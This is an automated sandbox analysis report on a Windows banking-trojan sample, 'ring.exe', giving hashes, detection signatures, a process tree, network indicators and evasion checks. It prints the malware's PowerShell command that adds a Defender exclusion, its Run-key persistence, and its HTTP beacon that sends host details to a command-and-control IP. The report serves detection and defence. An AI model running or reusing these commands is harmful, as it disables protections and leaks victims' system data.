
Windows Analysis Report
ring.exe

Overview

General Information

Sample name: ring.exe
Analysis ID: 1558818
MD5: dec85de31c5a9e3754ab0fcfed8a3e79
SHA1: b47c8f4918518f1538842b5b12bc5dcbea5c3d59
SHA256: fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
Tags: 154-205-156-20, api-computadoratualizacao-com, exe, mesh-computadoratualizacao-com, user-johnk3r

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens network shares
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • ring.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
    • cmd.exe (PID: 2460 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2928 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • ring.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
  • ring.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ring.exe", ParentImage: C:\Users\user\Desktop\ring.exe, ParentProcessId: 6300, ParentProcessName: ring.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2460, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Win_24230\ring.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ring.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinSesp
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2928, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T20:36:17.886678+0100 | 2020315 | 1 | A Network Trojan was detected | 192.168.2.7 | 49707 | 24.152.39.13 | 55417 | TCP
2024-11-19T20:36:18.601634+0100 | 2020316 | 1 | A Network Trojan was detected | 24.152.39.13 | 55417 | 192.168.2.7 | 49707 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.8% probability
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Joe Sandbox ML: detected
Source: ring.exe | Joe Sandbox ML: detected
Source: ring.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ring.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2020315 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT connection : 192.168.2.7:49707 -> 24.152.39.13:55417
Source: Network traffic | Suricata IDS: 2020316 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT response : 24.152.39.13:55417 -> 192.168.2.7:49707
Source: global traffic | TCP traffic: 192.168.2.7:49705 -> 24.152.39.13:55417
Source: Joe Sandbox View | IP Address: 104.237.62.213
Source: Joe Sandbox View | ASN Name: MasterDaWebBR
Source: unknown | DNS query: name: api64.ipify.org
Source: global traffic | HTTP traffic detected:
  GET /?format=text HTTP/1.1
  Host: api64.ipify.org
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: unknown | TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
  GET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1
  User-Agent: Delphi 5.x
  Host: 154.205.156.20
  Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic | DNS traffic detected: DNS query: adsklbb.org
Source: ring.exe, ring.exe.4.dr | String found in binary or memory: http://154.205.156.20/Painel/atualiza_update.php
Source: ring.exe, ring.exe.4.dr | String found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php
Source: ring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B
Source: ring.exe, ring.exe.4.dr | String found in binary or memory: http://api64.ipify.org/?format=text
Source: ring.exe, ring.exe.4.dr | String found in binary or memory: http://www.indyproject.org/
Source: ring.exe.4.dr | Static PE information: Number of sections : 11 > 10
Source: ring.exe | Static PE information: Number of sections : 11 > 10
Source: ring.exe, 00000004.00000002.2527929541.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ring.exe
Source: ring.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal84.spyw.evad.winEXE@9/9@2/3
Source: C:\Users\user\Desktop\ring.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\atualizar_dados[1].htm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\ring.exe | Mutant created: \Sessions\1\BaseNamedObjects\kkdiiii
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kecezh5z.vbm.ps1
Source: C:\Users\user\Desktop\ring.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\ring.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ring.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ring.exe | String found in binary or memory: NATS-SEFI-ADD
Source: ring.exe | String found in binary or memory: NATS-DANO-ADD
Source: ring.exe | String found in binary or memory: JIS_C6229-1984-b-add
Source: ring.exe | String found in binary or memory: jp-ocr-b-add
Source: ring.exe | String found in binary or memory: JIS_C6229-1984-hand-add
Source: ring.exe | String found in binary or memory: jp-ocr-hand-add
Source: ring.exe | String found in binary or memory: ISO_6937-2-add
Source: C:\Users\user\Desktop\ring.exe | File read: C:\Users\user\Desktop\ring.exe
Source: unknown | Process created: C:\Users\user\Desktop\ring.exe "C:\Users\user\Desktop\ring.exe"
Source: C:\Users\user\Desktop\ring.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: magnification.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: d3d9.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: security.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: idndl.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: vboxhook.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\ring.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: magnification.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: security.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: idndl.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\ring.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ring.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ring.exe | Static file information: File size 17488384 > 1048576
Source: ring.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4a2400
Source: ring.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xb87600
Source: ring.exe | Static PE information: More than 200 imports for user32.dll
Source: ring.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ring.exe | Static PE information: section name: .didata
Source: ring.exe.4.dr | Static PE information: section name: .didata
Source: C:\Users\user\Desktop\ring.exe | File created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe
Source: C:\Users\user\Desktop\ring.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinSesp

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\ring.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ring.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ring.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\SysWOW64\Wbem\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\system\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\SysWOW64\OpenSSH\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Users\user\Desktop\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: \\\VBoxMiniRdrDN
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\VBoxHook.dll
Source: C:\Users\user\Desktop\ring.exe | File opened / queried: C:\Windows\SysWOW64\VBoxHook.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7319
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196 | Thread sleep count: 7319 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200 | Thread sleep count: 2374 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: ring.exe, ring.exe.4.dr | Binary or memory string: VBoxHook.dllU
Source: ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT
Source: ring.exe, 00000004.00000002.2527929541.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2527929541.0000000001B10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ring.exe.4.dr | Binary or memory string: VMWare
Source: ring.exe, 0000000D.00000003.1458057883.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 0000000E.00000003.1536980330.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ring.exe, ring.exe.4.dr | Binary or memory string: \\\\.\\\VBoxMiniRdrDN
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ring.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: ring.exe, 00000004.00000002.2529177771.00000000036A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program Manager@
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
